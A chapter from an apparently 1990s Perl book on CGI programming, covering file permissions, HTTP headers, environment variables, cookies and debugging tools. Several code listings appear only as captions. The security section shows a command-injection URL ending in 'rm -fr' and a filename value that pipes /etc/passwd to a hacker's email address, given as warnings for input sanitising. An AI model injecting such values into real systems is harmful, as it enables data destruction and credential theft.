| |||
Links Sections Why Are File Permissions Important in UNIX? Chapters Part I: Basic Perl 02-Numeric and String
Literals Part II: Intermediate Perl Part III: Advanced Perl 13-Handling Errors and
Signals Part IV: Perl and the Internet 21-Using Perl with Web
Servers Appendixes |
CGI, or Common Gateway Interface, is the standard programming interface between web servers and external programs. It is almost one of the most exciting and fun areas of programming today. The CGI standard lets web browsers pass information to programs written in any language. If you want to create a lightning-fast search engine, then your CGI program will most likely be written in C or C++. However, most other applications can use Perl.
The CGI standard does not exist in isolation, it is dependent on the HTML and HTTP standards. HTML is the standard that lets web browsers understand document content. HTTP is the communications protocol that, among other things, lets web servers talk with web browser.
Note |
If you are unfamiliar with HTML, you might want to skip to the HTML introduction in Chapter 20, "Form Processing," before continuing. Otherwise, take the HTML references in this chapter at face value. |
Almost anyone can throw together some HTML and hang a "home page" out on the web. But most sites out there are, quite frankly, boring. Why? The fact is that most sites are built as a simple series of HTML documents that never change. The site is completely static. No one is likely to visit a static page more than once or twice. Think about the sites you visit most often. They probably have some interesting content, certainly, but more importantly, they have dynamic content.
So what's a webmaster to do? No webmaster has the time to update their web site by hand every day. Fortunately, the people who developed the web protocol thought of this problem and gave us CGI. CGI gives you a way to make web sites dynamic and interactive.
Each word in the acronym, "Common Gateway Interface," helps to understand the interface:
CGI applications can perform nearly any task that your imagination can think up. For example, you can create web pages on-the-fly, access databases, hold telnet sessions, generate graphics, and compile statistics.
The basic concept behind CGI is pretty simple, however, actually creating CGI applications is not. That requires real programming skills. You need to be able to debug programs and make logical connections between one idea and another. You also need to have the ability to visualize the application that you'd like to create. This chapter and the next, "Form Processing," will get you started with CGI programming. If you plan to create large applications, you might want to look at Que's "Special Edition, Using CGI".
The advantage of an interpreted language in CGI applications is its simplicity in development, debugging and revision. By removing the compilation step, you and I can move more quickly from task to task, without the frustration that can sometimes arise from debugging compiled programs. Of course not any interpreted language will do. Perl has the distinct advantage of having an extremely rich and capable functionality.
There are some times when a mature CGI application should be ported to C or another compiled language. These are the web applications where speed is important. If you expect to have a very active site, you probably want to move to a compiled language because they run faster.
CGI applications should be designed to take advantage of the centralized nature of a web server. They are great for searching databases, processing HTML form data, and other applications that require limited interaction with a user.
Java applications are good when you need a high degree of interaction with users; for example, games or animation.
Java programs need to be kept relatively small because they are transmitted through the Internet to the client. CGI applications on the other hand can be as large as needed because they reside and are executed on the web server.
You can design your web site to use both Java and CGI applications. For example, you might want to use Java on the client side to do field validation when collecting information on a form. Then once the input has been validated, the Java application can send the information to a CGI application on the web server where the database resides.
You might find that CGI.pm is overkill for simple CGI applications. If so, look at cgi-lite.pl. This library doesn't do as much as CGI.pm but you'll probably find that it is easier to use.
You can find both of these scripts at one of the CPAN web sites that are mentioned in Chapter 22, "Internet Resources."
However in this book, I have purposely not used these scripts. I feel it is important for you to understand the mechanisms behind the protocols. This will make debugging your applications easier because you'll have a better idea what the modules are doing behind the scenes. You will also be able to make better use of pre-existing modules if you can make educated guesses about what a poorly documented function does.
Tip
You can test your scripts locally as long as you can
use Perl on your local machine. See the "Debugging
CGI Programs" section later in this chapter.
Web servers are generally configured so that all CGI applications are placed into a cgi-bin directory. However, the web server may have aliases so that "virtual directories" exist. Each user might have their own cgi-bin directory. The directory location is totally under the control of your web site administrator.
Tip
Finding out which directory your scripts need to be
placed in is the first step in creating CGI programs. Since you need to
get this information from your web site administrator, send an email
message right now requesting this information. Also ask if there are any
CGI restrictions or guidelines that you need to
follow.
http://localhost/cgi-bin/test.pl
The web server will execute your
CGI script and any output is displayed by your web browser.
The URL for your CGI program is a virtual path. The actual location of the script on the web server depends on the configuration of the server software and the type of computer being used. For example, if your computer is running the Linux operating system and the NCSA web server in a "standard" configuration then the above virtual would translate into /usr/local/etc/httpd/cgi-bin/test.pl. If you were running the webSite server under Windows 95, the translated path might be /website/cgi-shl/test.pl.
If you have installed and are administering the web server yourself, you probably know where to place your scripts. If you are using a service provider's web server, ask the server's administrator where to put your scripts and how to reference them from your documents.
There are other ways to invoke CGI programs besides using a web browser to visit the URL. You can also start CGI programs from:
<A HREF="cgi-bin/test.pl">Click here to run a CGI program</A>
Interestingly enough you can pass information to your CGI program by adding extra information to the standard URL. If your CGI program is used for searching your site, for example, you can pass some information to specify which directory to search. The following HTML hyperlink will invoke a search script and tell it to search the /root/document directory.
<A HREF="cgi-bin/search.pl/root/document">Search the Document Directory</A>
This
extra path information can be accessed through the PATH_INFO
environment variable.
You can also use a question mark to pass information to a CGI program. Typically a question mark indicates that you are passing keywords that will be used in a search.
<A HREF="cgi-bin/search.pl?Wine+1993">Search for 1993 Wines</A>
The
information that follows the question mark will be available to your CGI program
through the QUERY_STRING environment variables.
Using either of these approaches will let you create canned CGI requests. By creating these requests ahead of time, you can reduce the amount of typing errors that your users might otherwise have. Later in this chapter, the "CGI and Environment Variables" section discusses all of the environment variables you can use inside CGI programs.
Note |
Generally speaking, visitors to your web site should never have to type in the URL for a CGI program. A hypertext link should always be provided to start the program. |
Pseudocode |
Turn on the warning option. Turn on the strict pragma. Send the HTTP header to the web browser. Send a line of text to the web browser. |
Listing 19.1-19LST01.PL - A Very Small CGI Program |
|
The file that contains this CGI program should be placed in your web server's cgi-bin directory. Then, the URL for this program will be something like http://localhost/cgi-bin/test.pl (change localhost to correspond to your web server's hostname). Enter this URL into your web browser and it should display a web page saying "This is a test."
Note |
You may wonder how the web server knows that a CGI program should be executed instead of being displayed. This is an excellent question. It can be best answered by referring to the documentation that came with your particular server. |
When the web server executes your CGI program, it automatically opens the STDIN, STDOUT, and STDERR file handles for you.
The web server will also make some information available to your CGI program through environment variables. You may recall the %ENV hash from Chapter 12, "Using Special Variables." Details about the environment variables that you can use can be found in the "CGI and Environment Variables" section later in this chapter.
UNIX can control file access in a number of ways. There are three levels of permissions for three classes of users. To view the permissions on a file use the ls command with the -l command-line option. For Example:
C:indyunix:~/public_html/pfind>ls -l
total 40
-rw-r--r-- 1 dbewley staff 139 Jun 18 14:14 home.html
-rwxr-xr-x 1 dbewley staff 9145 Aug 14 07:06 pfind
drwxr-xr-- 2 dbewley staff 512 Aug 15 07:11 tmp
Each line of
this listing indicates a separate directory entry. The first character of the
first column is normally either a dash or the letter d. If a directory
entry has a d it means that the entry is a subdirectory of the current
directory.
The other nine characters are the file permissions. Permissions should be thought of in groups of three, for the three classes of user. The three classes of user are:
Each of the classes can have one or more of the following three levels of permission:
If a permission is not allowed to the user that ran the ls command, its position is filled with a dash. For example:
ls -l hform.html
-rwx------ 1 dbewley staff 11816 May 9 09:19 slideshow.pl
The
owner, dbewley, has full rights - read, write, and execute for this
file. The group, staff, and everyone else have no rights.
Tip |
Perl scripts are not compiled, they must be read by the perl interpreter each time they are run. Therefore, perl scripts unlike compiled programs must have execute and read permissions. |
Here is another example:
ls -l pfind.pl
-rwxr-x--- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
This
time, the owner has full access while the group staff can read and execute the
file. All others have no rights to this file.
Most HTML files will have permissions that look like this:
ls -l schedule.html
-rw-r--r-- 1 dbewley staff 2439 Feb 8 1996 schedule.html
Everyone
can read it, but only the user can modify or delete it. There is no need have
execute permission since HTML is not an executable language.
You can change the permissions on a file by using the chmod command. The chmod command recognizes the three classes of user as u, g, and o and the three levels of permissions as r, w, and x. It grants and revokes permissions with a + or - in conjunction with each permission that you want to change. It also will accept an a for all three classes of users at once.
The syntax of the chmod command is:
chmod <options> <file>
Here are some examples of the
chmod command in action:
ls -l pfind.pl
-rw------- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod u+x pfind.pl
ls -l pfind.pl
-rwx------ 1 dbewley staff 2863 Oct 10 1995 pfind.pl
The
first ls command shows you the original file permissions. Then, the
chmod command added execute permission for the owner (or user) of
pfind.pl. The second ls command displays the newly changed
permissions.
To add these permissions for the both the group and others classes use go+rx as in the following example. Remember, users must have at least read and execute permissions to run perl scripts.
ls -l pfind.pl
-rwx------ 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod go+rx pfind.pl
ls -l pfind.pl
-rwxr-xr-x 1 dbewley staff 2863 Oct 10 1995 pfind.pl
Now, any
user can read and execute pfind.pl. Let's say a serious bug was found
in pfind.pl and we don't want it to be executed by anyone. To revoke execute
permission for all classes of user use the a-x option with the
chmod command.
ls -l pfind.pl
-rwxr-xr-x 1 dbewley staff 2863 Oct 10 1995 pfind.pl
chmod a-x pfind.pl
ls -l pfind.pl
-rw-r--r-- 1 dbewley staff 2863 Oct 10 1995 pfind.pl
Now, all
users can read pfind.pl, but no one can execute it.
Response Type | HTTP Header |
---|---|
Text | Content Type: text/plain |
HTML page | Content Type: text/html |
gif graphic | Content Type: image/gif |
Redirection to anther web page | Location: http://www.foobar.com |
Cookie | Set-cookie: ... |
Error Message | Status: 402 |
All HTTP headers must be followed by a blank line. Use the following line of code as a template:
print("Content Type: text/html\n\n");
Notice that the HTTP header
is followed by two newline characters. This is very important. It ensures
that a blank line will always follow the HTTP header.
If you have installed any helper applications for Netscape or are familiar with MIME types, you already recognize the text/plain and text/html parts of the Content Type header. They tell the remote web browser what type of information you are sending. The two most common MIME types to use are text/plain and text/html.
The Location header is used to redirect the client web browser to another web page. For example, let's say that your CGI script is designed to randomly choose from among 10 different URLs to order to determine the next web page to display. Once the new web page is choosen, your program outputs it like this:
print("Location: $nextPage\n\n");
Once the Location
header has been printed, nothing else should be printed. That is all the
information that the client web browser needs.
Cookies and the Set-cookie: header are discussed in the "Cookies" section later in this chapter.
The last type of HTTP header is the Status header. This header should be sent when an error arises in your script that your program is not equipped to handle. I feel that this HTTP header should not be used unless you are under severe time pressure to complete a project. You should try to create your own error handling routines that display a full web page that explains the error that happened and what the user can do to fix or circumvent it. You might include the time, date, type of error, contact names and phone numbers and any other information that might be useful to the user. Relying on the standard error messages of the web server and browser will make your web site less user friendly.
Table 19.2 contains a short description of each environment variable. A complete description of the environmental variables used in CGI programs can be found at
http://www.ast.cam.ac.uk/~drtr/cgi-spec.html
CGI Environment Variables | Description |
---|---|
AUTH_TYPE | Optionally provides the authentication protocol used to access your script if the local web server supports authentication and if authentication was used to access your script. |
CONTENT_LENGTH | Optionally provides the length, in bytes, of the content provided to the script through the STDIN file handle. Used particularly in the POST method of form processing. See Chapter 20, "Form Processing," for more information. |
CONTENT_TYPE | Optionally provides the type of content available from the STDIN file handle. This is used for the POST method of form processing. Most of the time this variable will be blank and you can assume a value of application/octet-stream. |
GATEWAY_INTERFACE | Provides the version of CGI supported by the local web server. Most of the time this will be equal to CGI/1.1. |
HTTP_ACCEPT | Provides a comma-separated list of MIME types the browser software will accept. You might check this environmental variable to see if the client will accept a certain kind of graphic file |
HTTP_USER_AGENT | Provides the type and version of the user's web browser. For example, the Netscape web browser is called Mozilla. |
HTTP_FROM | Provides the user's email address. Not all web browsers will supply this information to your server. Therefore, only use this field to provide a default value for an HTML form. |
QUERY_STRING | Optionally contains form information when the GET method of form processing is used. QUERY_STRING is also used for passing information like search keywords to CGI scripts. |
PATH_INFO | Optionally contains any extra path information from the HTTP request that invoked the script. |
PATH_TRANSLATED | Maps the script's virtual path (i.e. from the root of the server directory) to the physical path used to call the script. |
REMOTE_ADDR | Contains the dotted decimal address of the user. |
REMOTE_HOST | Optionally provides the domain name for the site that the user has connected from. |
REMOTE_IDENT | Optionally provides client identification when your local server has contacted an IDENTD server on a client machine. You will very rarely see this because the IDENTD query is slow. |
REMOTE_USER | Optionally provides the name used by the user to access your secured script. |
REQUEST_METHOD | Usually contains either "GET" or "POST" - the method by which form information will be made available to your script. See Chapter 20, "Form Processing," for more information. |
SCRIPT_NAME | Contains the virtual path to the script. |
SERVER_NAME | Contains the configured hostname for the server. |
SERVER_PORT | Contains the port number that the local web server software is listening on. The standard port number is 80. |
SERVER_PROTOCOL | Contains the version of the web protocol this server uses. For example, HTTP/1.0. |
SERVER_SOFTWARE | Contains the name and version of the web server software. For example, webSite/1.1e. |
To clear up the ambiguity, the URL encoding scheme was created. Any spaces are converted into plus (+) signs to avoid semantic ambiguities. In addition, special characters or 8-bit values are converted into their hexadecimal equivalents and prefaced with a percent sign (%). For example, the string Davy Jones <dj@mtolive.com> is encoded as Davy+Jones+%3Cdj@mtolive.com%3E. If you look closely, you see that the < character has been converted to %3C and the > character has been coverted to %3E.
Your CGI script will need to be able to convert URL encoded information back into its normal form. Fortunately, Listing 19.2 contains a function that converts URL encoded information.
Pseudocode |
Define the decodeURL() function. Get the encoded string from the parameter array. Translate all plus signs into spaces. Convert character coded as hexadecimal digits into regular characters. Return the decoded string. |
Listing 19.2-19LST02.PL - How to Decode the URL Encoding |
|
This function will be used in Chapter 20, "Form Processing," to decode form information. It is presented here because canned queries also use URL encoding.
Suppose that you had a CGI script that formatted a directory listing and generated a web page that let visitors view the listing. In addition, let's say that the name of the directory to display was passed to your program using the PATH_INFO environment variable. The following URL could be used to call your program:
http://www.foo.com/cgi-bin/dirlist.pl/docs
Inside your program,
the PATH_INFO environment variable is set to docs. In order to
get the directory listing, all that is needed is a call to the ls
command in UNIX or the dir command in DOS. Everything looks good right?
But what if the program was invoked with this command line?
http://www.foo.com/cgi-bin/dirlist.pl/; rm -fr;
Now, all of a
sudden, you are faced with the possibility of files being deleted because the
semi-colon (;) lets multiple commands be executed on one command line.
This same type of security hole is possible any time you try to run an external command. You might be tempted to use the mail, sendmail, or grep commands to save time while writing your CGI program, but since all of these programs are easily duplicated using Perl try to resist the temptation.
Another security hole is related to using external data to open or create files. Some enterprising hacker could use "| mail hacker@hacker.com < /etc/passwd" as the filename to mail your password file or any other file to himself.
All of these security holes can be avoided by removing the dangerous characters (like the | or pipe character).
Pseudocode |
Define the improveSecurity() function. Copy the passed string into $_, the default search space. Protect against command-line options by removing - and + characters. Additional protection against command-line options. Convert all dangerous characters into harmless underscores. Return the $_ variable. |
Listing 19.3-19LST03.PL - How to Remove Dangerous Characters |
|
CGIwrap (http://wwwcgi.umr.edu/~cgiwrap/) is a UNIX based utility written by Nathan Neulinger which lets general users run CGI scripts without needing access to the server's cgi-bin directory. Normally all scripts must be located in the server's main cgi-bin directory and all run with the same UID (user id) as the web server. CGIwrap performs various security checks on the scripts before changing id to match the owner of the script. All scripts are executed with same the user id as the user who owns them. CGIwrap works with NCSA, Apache, CERN, Netsite, and probably any other UNIX web server.
Any files created by a CGI program are normally owned by the web server. This can cause a problem if you need to edit or remove files created by CGI programs. You might have to ask the system administrator for help because you lack the proper authorization. All CGI programs have the same system permissions as the web server. If you run your web server under the root user id - being either very brave or very foolish - a CGI program could be tricked into erasing the entire hard drive. CGIwrap provides a way around these problems.
With CGIwrap, scripts are located in users' public_html/cgi-bin directory and run under their user id. This means that any files the CGI program creates are owned by the same user. Damage caused by any security bugs you may have introduced - via the CGI program - will be limited to your own set of directories.
In addition to this security advantage, CGIwrap is also an excellent debugging tool. When CGIwrap is installed it is copied to cgiwrapd which can be used to view output of failing CGIs.
You can install CGIwrap by following these steps.
Tip |
You can find additional information at the http://www.umr.edu/~cgiwrap/install.html web site. |
CGIs that run using CGIwrap are stored in a cgi-bin directory under an individual user's public web directory and called like this:
http://servername/cgi-bin/cgiwrap/~userid/scriptname
To debug a
script run via cgiwrap add the letter "d" to cgiwrap:
http://servername/cgi-bin/cgiwrapd/~userid/scriptname
When you use
CGIwrap to debug your CGI programs, quite a lot of information will be displayed
in the web brower's window. For example, if you called a CGI program with the
following URL:
http://www.engr.iupui.edu/cgi-bin/cgiwrapd/~dbewley/cookie-test.pl
The
output might look like this:
Redirecting STDERR to STDOUT
Setting Limits (CPU)
Environment Variables:
QUERY_STRING: ''
PATH_INFO: '/~dbewley/cookie-test.pl'
REMOTE_HOST: 'x2s5p10.dialin.iupui.edu'
REMOTE_ADDR: '134.68.249.69'
SCRIPT_NAME: '/cgi-bin/cgiwrapd'
Trying to extract user/script from PATH_INFO
Extracted Data:
User: 'dbewley'
Script: 'cookie-test.pl'
Stripping user and script data from PATH_INFO env. var.
Adding user and script to SCRIPT_NAME env. var.
Modified Environment Variables:
PATH_INFO: ''
SCRIPT_NAME: '/cgi-bin/cgiwrapd/dbewley/cookie-test.pl'
Sanitize user name: 'dbewley'-'dbewley'
Sanitize script name: 'cookie-test.pl'-'cookie-test.pl'
Log Request
Opening log file.
Writing log entry.
Closing log file.
Done logging request.
User Data Retrieved:
UserName: 'dbewley'
UID: '8670'
GID: '200'
Directory: '/home/stu/d/dbewley'
UIDs/GIDs Changed To:
RUID: '8670'
EUID: '8670'
RGID: '200'
EGID: '200'
Current Directory: '/sparcus/users/dbewley/www/cgi-bin'
Results of stat:
File Owner: '8670'
File Group: '200'
Exec String: './cookie-test.pl'
Output of script follows:
=====================================================
Set-Cookie: user=dbewley; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu;
Set-Cookie: flag=black; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.iupui.edu;
Set-Cookie: car=honda:accord:88:LXI:green; expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; domain=.engr.iupui.edu;
Content-type: text/html
Cookies:<BR>
flag = black<br>
car = honda:accord:88:LXI:green<br>
user = dbewley<br>
This output can be invaluable if your script
is dying because of a syntax error before it can print an HTTP header to the
browser.
Note |
If you'd like a more in-depth description of CGI
Security visit these web sites:
|
One answer to this dilemma is to use cookies in your CGI programs. Cookies can provide a way to maintain information from one HTTP request to the next - remember the concept of persistent information?
A cookie is a small chunk of data, stored on the visitor's local hard drive by the web sever. It can be used to track your path through a web site and develop a visitor's profile for marketing or informational purposes. Cookies can also be used to hold information like account numbers and purchase decisions so that shopping applications can be created.
During a browsing session Netscape stores cookies in memory, but when the browser is exited cookies are written into a file called cookies.txt. On the Macintosh the cookie jar is in a file called MagicCookie in the preferences folder. The cookie file contains plain text as shown in Listing 19.3.
When all of these elements are put together they look like this:
Set-Cookie: user_addr=ppp1.dialin.iupui.edu; [iccc]
expires=Wednesday, 09-Nov-99 00:00:00 GMT; path=/cgi-bin/; [iccc]
domain=.engr.iupui.edu; secure
Listing 19.4 contains a program that
both sets and read cookies. First, it will create four cookies and then it will
read those cookies from the HTTP_COOKIE environment variable. Inside
the HTTP_COOKIE environment variable, the cookies are delimited by a semi-colon
and a space. The cookie fields are separated by commas, and the name-value pairs
are separated by equal signs. In order to use cookies, you need to parse the
HTTP_COOKIE variable at three different levels.
Pseudocode |
Turn on the warning option. Turn on the strict pragma. Declare a variable to hold the expiration date and time of the cookies. Declare a variable to hold the domain name. Declare a variable to hold the path name. Set four cookies with different values. Read those four cookies from the environment place them into %cookies. Start the HTML web page. Display a text heading on the web page. Start an HTML table. Display each cookie in a table row. End the table. End the web page. Define the setCookie() function. Create local variables from the parameter array. Send the Set-Cookie: HTTP header to the web browser. Send the secure option only if requested. End the header with a newline. Define the getCookies() function. Create a local hash to hold the cookies. Iterate over an array created by splitting the HTTP_COOKIE environment variable based on the "; " character sequence. Split off the name of the cookie. Create a hash entry with the cookie's name as the key and the rest of the cookie as the entry's value. Return the hash. |
Listing 19.4-19LST04.PL - How to Set and Retrieve Cookies |
|
This program shows that the web server stores a copy of any cookies that you set into the HTTP_COOKIE environment variable. It only performs one level of parsing. In order to create a really useful getCookies() function, you need to split the cookie on the comma character and then again on the equals character.
Listing 19.5 contains a script that shows you a nice way of automatically determining if a visitor's web browser supports cookies. The CGI program will set a cookie and then redirect the visitor's web browser back to itself with some additional path information. When the script (during its second invocation) sees the extra path information, it checks for the previously created cookie. If it exists, the visitor's browser has passed the test. Otherwise, the visitor's browser does not support cookies.
Pseudocode |
Turn on the warning option. Turn on the strict pragma. If there is no query information, then set a cookie and reload the script. Otherwise, see if the cookie set before the reload exists. If the cookie exists, the browser supports cookies. If the cookie does not exist, the browser does not support cookies. |
Listing 19.5-19LST05.PL - How to Tell If the Visitor's Browser Supports Cookies |
|
Note |
You can find more information about cookies at these
web sites:
http://home.netscape.com/newsref/std/cookie_spec.html http://www.netscapeworld.com/netscapeworld/nw-07-1996/nw-07-cookies.html http://www.emf.net/~mal/cookiesinfo.html http://ds.internic.net/internet-drafts/draft-ietf-http-state-mgmt-03.txt http://www.illuminatus.com/cookie/ http://www.jasmin.com/cook0696.html http://www.bravado.net/rodgers/InterNetNews.html |
Pseudocode |
Send the HTTP header indicating a plain text document. Send a line of text. Call the logError() function to send a message to the server's log file. Call the logError() function to send a message to the server's log file. Send a line of text. Define the logError() function. Declare a local variable to hold the message. Print the message to STDERR with a timestamp. Define the timeStamp() function. Declare some local variables to hold the current date and time. Call the zeroFill() function to format the numbers. Return a formatted string holding the current date and time. Define the zeroFill() function - turns "1" into "01". Declare a local variable to hold the number to be filled. Declare a local variable to hold the string length that is needed. Find difference between current string length and needed length. If the string is big enough (like "12") then return it. If the string is too big, prefix it with some zeroes. |
Listing 19.6-19LST06.PL - Sending Messages to the Server's Error Log |
|
Caution |
According to the CGI specifications the STDERR file handle should be connected to the server's error log. However, I found that this was not true when using Windows 95 and O'Reilly's Website server software. There may be other combinations of operating systems and server software that also fail to connect STDERR to the error log. |
open(STDERR, ">&STDOUT");
After that statement is executed
the output of all print statements that use the STDERR file handle will
be displayed in the web browser window.
You need to be a little careful when using this ability. Your normal error messages will not have the HTML tags required to make them display properly.
CGITap may be installed in any CGI enabled directory and requires perl4.036 or later. You can install CGITap by following these steps:
CGITap has two methods of debugging. The first is adequate for simple CGI applications which do not use HTML forms for input. The second method is used for CGI programs which process HTML form information.
For simple CGIs, add cgitap to the URL. For example, normally a CGI program that just prints the date is called like this:
http://localhost/cgi-bin/date
That CGI program might display the following in the browser's window:
Sun Aug 18 16:07:37 EST 1996
In order to use CGITap for debugging,
use a similar URL but with cgitap inserted.
http://localhost/cgi-bin/cgitap/date
CGITap will extract your CGI
program's name, display the CGI environment to the browser, perform some checks
on the program, then execute the program and return the actual results (both in
HTML source, and the actual document).
CGI programs that process HTML forms will be discussed in Chapter 20, "Form Processing," but while I'm talking about CGITap let me also mention how to use CGITap with HTML Forms. A slightly more complicated method must be used for debugging complex CGI scripts which require form processing.
The URL of a form's action is hard coded (via the ACTION modifier of the <FORM> tag) and you may not wish to change it to include cgitap. To allow CGITap to execute automatically when the form posts to its normal action URL, you can make use of UNIX symbolic links. If you are using Windows NT or Windows 95, you must change the URL in the HTML form. The steps for UNIX platforms are:
For example, let's assume you have a CGI script called mailit that processes form input data, mails the information to you and returns an HTML page to the web browser. To debug this script, move mailit to mailit.tap using the following command:
mv mailit mailit.tap
Then create a link to cgitap using
this command:
ln -s cgitap mailit
Now you can fill in the HTML form and submit
it as usual.
This method allows UNIX-based scripts and forms to be debugged without having to change hard coded URL's in your HTML documents. When the form is posted the results will be the CGITap debugging information, followed by the normal output of mailit.
Pseudocode |
Try (and fail) to open a file. Call the error() function. Define the error() function. Declare a local variable to hold the error message string. Output an HTML page to display the error message. |
Listing 19.7-19LST07.PL - Generating an Error Response Using HTML |
|
I'm sure you agree that error messages that you provide are more informative than the standard ones.
After those introductory comments, the fun started. CGI programs were shown to be invoked by a URL. The URL could be entered directly into a web browser or stored in a web page as a hypertext link or the destination for HTML form information.
Before CGI program can be run under the UNIX operating systems, their file permissions need to be set correctly. Files have three types of permissions: read, write, and execute. And there are three types of users that access files: user, group, and others. CGI programs must be both readable and executable by others.
The first line of output of any CGI program must be some type of HTTP header. The most common header is Content-type: which basically tells the web browser what to expect (plain text, perhaps? Or maybe some HTML). The Location: header redirects the web browser to another URL. The Set-cookie: header stores a small bit of information on the visitor's local disk. The last header is Status:, which tells the web browser that an error has arisen.
By placing a / or ? at the end of a URL, information can be passed to the CGI program. Information after a / is placed into the PATH_INFO environment variable. Information after a ? is placed into the QUERY_STRING environment variable.
Environment variables play a big role in CGI programs. They are the principal means that web servers use to provide information. For example, you can find out the client's IP address using the REMOTE_ADDR variable. And the SCRIPT_NAME variable contains the name of the current program.
URL encoding is used to prevent characters from being misinterpreted. For example, the < character is usually encoded as %3C. In addition, most spaces are converted into plus signs. Listing 19.1 contains a function called decodeURL() that will decode the URL encoding.
One of the biggest security risks happens when a user's data (form input or extra path information) is exposed to operating system commands like mail or grep. Never trust user input! Always suspect the worst. Most hackers spend many hours looking at manuals and source code to find software weaknesses. You need to read about web security in order to protect your site.
The CGIwrap program offers a way to limit the damage potential by running CGI program with a user id that is different from the web server's. The programs are running using the user's user id so that damage is limited to your home directory.
Cookies are used to store information on the user's hard drive. They are a way to create persistent information that lasts from one visit to the next.
You can debug CGI programs by sending messages to the server's log file using the STDERR file handle. Or you could redirect STDERR to STDOUT so that the messages appear in the client web browser's window. If you have a complex problem, consider using CGItap, a program that lets you see all of the environment variables available to your program.
The next chapter, "Form Processing," will introduce you to HTML Forms and how CGI programs can process form information. After the introduction, a Guest book application will be presented. Guest books let visitors leave comments that can be viewed later by other visitors.